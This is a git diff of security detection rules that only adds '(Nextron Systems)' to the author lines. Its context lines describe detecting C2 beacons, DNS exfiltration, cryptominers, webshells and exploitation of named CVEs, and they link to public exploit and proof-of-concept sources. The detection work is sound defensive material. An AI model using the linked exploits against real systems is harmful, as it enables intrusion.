a/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml b/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml index 4e415872e..9d94cc951 100644 --- a/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml +++ b/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of "find" binary in a suspicious manner to perform discovery references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/28 tags: - attack.discovery diff --git a/rules/network/dns/net_dns_external_service_interaction_domains.yml b/rules/network/dns/net_dns_external_service_interaction_domains.yml index c35b22647..6c05ec273 100644 --- a/rules/network/dns/net_dns_external_service_interaction_domains.yml +++ b/rules/network/dns/net_dns_external_service_interaction_domains.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE references: - https://twitter.com/breakersall/status/1533493587828260866 -author: Florian Roth, Matt Kelly (list of domains) +author: Florian Roth (Nextron Systems), Matt Kelly (list of domains) date: 2022/06/07 tags: - attack.initial_access diff --git a/rules/network/dns/net_dns_mal_cobaltstrike.yml b/rules/network/dns/net_dns_mal_cobaltstrike.yml index 09545969f..e88298a07 100644 --- a/rules/network/dns/net_dns_mal_cobaltstrike.yml +++ b/rules/network/dns/net_dns_mal_cobaltstrike.yml @@ -5,7 +5,7 @@ description: Detects suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/05/10 modified: 2022/10/09 tags: diff --git a/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml b/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml index a3cc98312..97e90addc 100644 --- a/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml +++ b/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml @@ -4,7 +4,7 @@ status: stable description: Detects suspicious DNS queries to Monero mining pools references: - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/24 tags: - attack.impact diff --git a/rules/network/dns/net_dns_susp_b64_queries.yml b/rules/network/dns/net_dns_susp_b64_queries.yml index 8d929173e..3ef23ee85 100644 --- a/rules/network/dns/net_dns_susp_b64_queries.yml +++ b/rules/network/dns/net_dns_susp_b64_queries.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious DNS queries using base64 encoding references: - https://github.com/krmaxwell/dns-exfiltration -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/05/10 modified: 2022/10/09 tags: diff --git a/rules/network/dns/net_dns_susp_telegram_api.yml b/rules/network/dns/net_dns_susp_telegram_api.yml index 46d88cedb..fa940cc92 100644 --- a/rules/network/dns/net_dns_susp_telegram_api.yml +++ b/rules/network/dns/net_dns_susp_telegram_api.yml @@ -7,7 +7,7 @@ references: - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/06/05 modified: 2022/10/09 tags: diff --git a/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml b/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml index 1d67119c2..16eb048d4 100755 --- a/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml +++ b/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml @@ -5,7 +5,7 @@ description: Detects communication to C2 servers mentioned in the operational no references: - https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/04/15 modified: 2021/11/27 tags: diff --git a/rules/web/product/apache/web_apache_segfault.yml b/rules/web/product/apache/web_apache_segfault.yml index 75c2f1c43..f008794cf 100644 --- a/rules/web/product/apache/web_apache_segfault.yml +++ b/rules/web/product/apache/web_apache_segfault.yml @@ -4,7 +4,7 @@ status: test description: Detects a segmentation fault error message caused by a creashing apache worker process references: - http://www.securityfocus.com/infocus/1633 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/28 modified: 2021/11/27 tags: diff --git a/rules/web/product/apache/web_apache_threading_error.yml b/rules/web/product/apache/web_apache_threading_error.yml index 8aa2af739..f13feedd5 100644 --- a/rules/web/product/apache/web_apache_threading_error.yml +++ b/rules/web/product/apache/web_apache_threading_error.yml @@ -4,7 +4,7 @@ status: test description: Detects an issue in apache logs that reports threading related errors references: - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/22 modified: 2021/11/27 logsource: diff --git a/rules/web/product/modsecurity/modsec_mulitple_blocks.yml b/rules/web/product/modsecurity/modsec_mulitple_blocks.yml index f98254afd..4d749bbdf 100644 --- a/rules/web/product/modsecurity/modsec_mulitple_blocks.yml +++ b/rules/web/product/modsecurity/modsec_mulitple_blocks.yml @@ -2,7 +2,7 @@ title: Multiple Modsecurity Blocks id: a06eea10-d932-4aa6-8ba9-186df72c8d23 status: stable description: Detects multiple blocks by the mod_security module (Web Application Firewall) -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/28 modified: 2023/01/07 tags: diff --git a/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml b/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml index 549358371..bc1f21d0f 100644 --- a/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml +++ b/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml @@ -4,7 +4,7 @@ status: test description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group references: - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/08 modified: 2022/10/09 tags: diff --git a/rules/web/proxy_generic/proxy_baby_shark.yml b/rules/web/proxy_generic/proxy_baby_shark.yml index 1774396fc..44c35b705 100644 --- a/rules/web/proxy_generic/proxy_baby_shark.yml +++ b/rules/web/proxy_generic/proxy_baby_shark.yml @@ -4,7 +4,7 @@ status: experimental description: Detects Baby Shark C2 Framework communication patterns references: - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/06/09 modified: 2022/08/15 tags: diff --git a/rules/web/proxy_generic/proxy_chafer_malware.yml b/rules/web/proxy_generic/proxy_chafer_malware.yml index 92c0529ef..4ad291c00 100644 --- a/rules/web/proxy_generic/proxy_chafer_malware.yml +++ b/rules/web/proxy_generic/proxy_chafer_malware.yml @@ -4,7 +4,7 @@ status: test description: Detects HTTP requests used by Chafer malware references: - https://securelist.com/chafer-used-remexi-malware/89538/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/01/31 modified: 2022/08/15 tags: diff --git a/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml b/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml index 65e1d0be5..809a3fccb 100644 --- a/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml +++ b/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml @@ -4,7 +4,7 @@ status: test description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike references: - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/06 modified: 2022/12/25 tags: diff --git a/rules/web/proxy_generic/proxy_download_susp_dyndns.yml b/rules/web/proxy_generic/proxy_download_susp_dyndns.yml index 0350a70f0..18d6d21cb 100644 --- a/rules/web/proxy_generic/proxy_download_susp_dyndns.yml +++ b/rules/web/proxy_generic/proxy_download_susp_dyndns.yml @@ -4,7 +4,7 @@ status: test description: Detects download of certain file types from hosts with dynamic DNS names (selected list) references: - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/11/08 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml b/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml index 52fbc8dfc..4fd49897b 100644 --- a/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml +++ b/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml @@ -10,7 +10,7 @@ references: - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf - https://www.spamhaus.org/statistics/tlds/ - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/11/07 modified: 2023/01/09 tags: diff --git a/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml b/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml index a8c9c043e..22396cac7 100644 --- a/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml +++ b/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml @@ -5,7 +5,7 @@ related: type: similar status: test description: Detects executable downloads from suspicious remote systems -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/13 modified: 2023/01/09 tags: diff --git a/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml b/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml index 3b483faaa..a299ca3ed 100644 --- a/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml +++ b/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml @@ -4,7 +4,7 @@ status: test description: Detects WebDav DownloadCradle references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/04/06 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml b/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml index 9c025eeb3..c2cb077e0 100644 --- a/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml +++ b/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml @@ -4,7 +4,7 @@ status: test description: Detects user agent and URI paths used by empire agents references: - https://github.com/BC-SECURITY/Empire -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/13 modified: 2022/08/05 tags: diff --git a/rules/web/proxy_generic/proxy_empty_ua.yml b/rules/web/proxy_generic/proxy_empty_ua.yml index 9d545ed49..031ec6969 100644 --- a/rules/web/proxy_generic/proxy_empty_ua.yml +++ b/rules/web/proxy_generic/proxy_empty_ua.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious empty user agent strings in proxy logs references: - https://twitter.com/Carlos_Perez/status/883455096645931008 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/08 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml b/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml index 9a9b9c44e..6d858d7a5 100644 --- a/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml +++ b/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempt of the OWASSRF variant targeting excha references: - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/22 tags: - attack.initial_access diff --git a/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml b/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml index 22a19f10b..bcd0eb70d 100644 --- a/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml +++ b/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml @@ -6,7 +6,7 @@ references: - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/ - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/22 tags: - attack.initial_access diff --git a/rules/web/proxy_generic/proxy_ios_implant.yml b/rules/web/proxy_generic/proxy_ios_implant.yml index f9d92f03b..fdfca9b93 100644 --- a/rules/web/proxy_generic/proxy_ios_implant.yml +++ b/rules/web/proxy_generic/proxy_ios_implant.yml @@ -5,7 +5,7 @@ description: Detects URL pattern used by iOS Implant references: - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html - https://twitter.com/craiu/status/1167358457344925696 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/08/30 modified: 2022/08/15 tags: diff --git a/rules/web/proxy_generic/proxy_powershell_ua.yml b/rules/web/proxy_generic/proxy_powershell_ua.yml index 80527953e..07dbe1963 100644 --- a/rules/web/proxy_generic/proxy_powershell_ua.yml +++ b/rules/web/proxy_generic/proxy_powershell_ua.yml @@ -4,7 +4,7 @@ status: test description: Detects Windows PowerShell Web Access references: - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/13 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_pwndrop.yml b/rules/web/proxy_generic/proxy_pwndrop.yml index 24c64ff13..f7959832d 100644 --- a/rules/web/proxy_generic/proxy_pwndrop.yml +++ b/rules/web/proxy_generic/proxy_pwndrop.yml @@ -4,7 +4,7 @@ status: test description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity references: - https://breakdev.org/pwndrop/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/04/15 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_raw_paste_service_access.yml b/rules/web/proxy_generic/proxy_raw_paste_service_access.yml index 34b8867dc..d484d1335 100644 --- a/rules/web/proxy_generic/proxy_raw_paste_service_access.yml +++ b/rules/web/proxy_generic/proxy_raw_paste_service_access.yml @@ -4,7 +4,7 @@ status: test description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form references: - https://www.virustotal.com/gui/domain/paste.ee/relations -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/05 modified: 2023/01/19 tags: diff --git a/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml b/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml index 67cb9bdcc..5d3e43ddd 100644 --- a/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml +++ b/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml @@ -4,7 +4,7 @@ status: test description: Detects a flashplayer update from an unofficial location references: - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/10/25 modified: 2022/08/08 tags: diff --git a/rules/web/proxy_generic/proxy_telegram_api.yml b/rules/web/proxy_generic/proxy_telegram_api.yml index 74d0aa2a5..da321603a 100644 --- a/rules/web/proxy_generic/proxy_telegram_api.yml +++ b/rules/web/proxy_generic/proxy_telegram_api.yml @@ -6,7 +6,7 @@ references: - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/06/05 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_turla_comrat.yml b/rules/web/proxy_generic/proxy_turla_comrat.yml index 6e3a4a213..def96ce89 100644 --- a/rules/web/proxy_generic/proxy_turla_comrat.yml +++ b/rules/web/proxy_generic/proxy_turla_comrat.yml @@ -4,7 +4,7 @@ status: test description: Detects Turla ComRAT patterns references: - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/26 modified: 2022/08/15 tags: diff --git a/rules/web/proxy_generic/proxy_ua_apt.yml b/rules/web/proxy_generic/proxy_ua_apt.yml index 0cd2a8241..eb6a9272b 100644 --- a/rules/web/proxy_generic/proxy_ua_apt.yml +++ b/rules/web/proxy_generic/proxy_ua_apt.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious user agent strings used in APT malware in proxy logs references: - Internal Research -author: Florian Roth, Markus Neis +author: Florian Roth (Nextron Systems), Markus Neis date: 2019/11/12 modified: 2022/10/10 tags: diff --git a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml index bf7d55891..89aecc687 100644 --- a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml +++ b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml @@ -2,7 +2,7 @@ title: Bitsadmin to Uncommon IP Server Address id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3 status: experimental description: Detects Bitsadmin connections to IP addresses instead of FQDN names -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/10 modified: 2022/08/24 tags: diff --git a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml index 35990eb17..63163d2c4 100644 --- a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml +++ b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml @@ -5,7 +5,7 @@ description: Detects Bitsadmin connections to domains with uncommon TLDs references: - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2019/03/07 modified: 2022/08/16 tags: diff --git a/rules/web/proxy_generic/proxy_ua_cryptominer.yml b/rules/web/proxy_generic/proxy_ua_cryptominer.yml index b2a16149d..04e5d7eba 100644 --- a/rules/web/proxy_generic/proxy_ua_cryptominer.yml +++ b/rules/web/proxy_generic/proxy_ua_cryptominer.yml @@ -5,7 +5,7 @@ description: Detects suspicious user agent strings used by crypto miners in prox references: - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65 - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/21 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_ua_frameworks.yml b/rules/web/proxy_generic/proxy_ua_frameworks.yml index ff1a600ed..e443432e9 100644 --- a/rules/web/proxy_generic/proxy_ua_frameworks.yml +++ b/rules/web/proxy_generic/proxy_ua_frameworks.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs references: - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/08 modified: 2021/11/27 tags: diff --git a/rules/web/proxy_generic/proxy_ua_hacktool.yml b/rules/web/proxy_generic/proxy_ua_hacktool.yml index fd89ac6b6..e28782298 100644 --- a/rules/web/proxy_generic/proxy_ua_hacktool.yml +++ b/rules/web/proxy_generic/proxy_ua_hacktool.yml @@ -5,7 +5,7 @@ description: Detects suspicious user agent strings user by hack tools in proxy l references: - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/08 modified: 2022/07/07 tags: diff --git a/rules/web/proxy_generic/proxy_ua_malware.yml b/rules/web/proxy_generic/proxy_ua_malware.yml index 0ab4fe1ee..79641392e 100644 --- a/rules/web/proxy_generic/proxy_ua_malware.yml +++ b/rules/web/proxy_generic/proxy_ua_malware.yml @@ -9,7 +9,7 @@ references: - https://perishablepress.com/blacklist/ua-2013.txt - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/08 modified: 2023/01/22 tags: diff --git a/rules/web/proxy_generic/proxy_ua_susp.yml b/rules/web/proxy_generic/proxy_ua_susp.yml index 0ee740b50..4888f415d 100644 --- a/rules/web/proxy_generic/proxy_ua_susp.yml +++ b/rules/web/proxy_generic/proxy_ua_susp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious malformed user agent strings in proxy logs references: - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/08 modified: 2022/10/31 tags: diff --git a/rules/web/proxy_generic/proxy_ua_susp_base64.yml b/rules/web/proxy_generic/proxy_ua_susp_base64.yml index 1ed755ff8..5658bc112 100644 --- a/rules/web/proxy_generic/proxy_ua_susp_base64.yml +++ b/rules/web/proxy_generic/proxy_ua_susp_base64.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string references: - https://blogs.jpcert.or.jp/en/2022/07/yamabot.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/08 modified: 2022/11/27 tags: diff --git a/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml b/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml index ac66a3cd2..7be0d5040 100644 --- a/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml +++ b/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml @@ -6,7 +6,7 @@ references: - https://vk9-sec.com/hfs-code-execution-cve-2014-6287/ - https://www.exploit-db.com/exploits/39161 - https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/19 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml index 2ee999be1..9a5cedb38 100644 --- a/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/webserver_generic/web_cve_2018_2894_weblogic_exploit.yml @@ -5,7 +5,7 @@ description: Detects access to a webshell dropped into a keystore folder on the references: - https://twitter.com/pyn3rd/status/1020620932967223296 - https://github.com/LandGrey/CVE-2018-2894 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/07/22 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml b/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml index 54757f7d3..1a8568c09 100644 --- a/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml +++ b/rules/web/webserver_generic/web_cve_2019_11510_pulsesecure_exploit.yml @@ -4,7 +4,7 @@ status: test description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole references: - https://www.exploit-db.com/exploits/47297 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/11/18 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml b/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml index 097fac95b..298457942 100644 --- a/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml +++ b/rules/web/webserver_generic/web_cve_2019_3398_confluence.yml @@ -4,7 +4,7 @@ status: test description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 references: - https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/26 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml b/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml index a4b970a4c..6138c0afa 100644 --- a/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml +++ b/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml @@ -4,7 +4,7 @@ status: test description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 references: - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/02/29 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml index decb1121d..9ffc01075 100644 --- a/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml +++ b/rules/web/webserver_generic/web_cve_2020_14882_weblogic_exploit.yml @@ -6,7 +6,7 @@ references: - https://isc.sans.edu/diary/26734 - https://twitter.com/jas502n/status/1321416053050667009?s=20 - https://twitter.com/sudo_sudoka/status/1323951871078223874 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/11/02 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml index 792a0e7a7..9f678d741 100644 --- a/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml +++ b/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml @@ -5,7 +5,7 @@ description: Detects exploitation attempts on Cisco ASA FTD systems exploiting C references: - https://twitter.com/aboul3la/status/1286012324722155525 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/07 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml b/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml index a7bf262ae..8d998368c 100644 --- a/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml +++ b/rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml @@ -7,7 +7,7 @@ references: - https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/ - https://twitter.com/yorickkoster/status/1279709009151434754 - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/05 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml b/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml index 8a93c35a2..aefc67896 100644 --- a/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml +++ b/rules/web/webserver_generic/web_cve_2020_8193_8195_citrix_exploit.yml @@ -6,7 +6,7 @@ references: - https://support.citrix.com/article/CTX276688 - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/ - https://dmaasland.github.io/posts/citrix.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/10 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml b/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml index b8c6455c9..aaf7e81ac 100644 --- a/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml +++ b/rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml @@ -4,7 +4,7 @@ status: test description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814 references: - https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/22 modified: 2023/01/02 tags: diff --git a/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml b/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml index 29a21225e..749cee017 100644 --- a/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml +++ b/rules/web/webserver_generic/web_cve_2021_28480_exchange_exploit.yml @@ -4,7 +4,7 @@ status: test description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 references: - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/05/14 modified: 2023/01/02 tags: diff --git 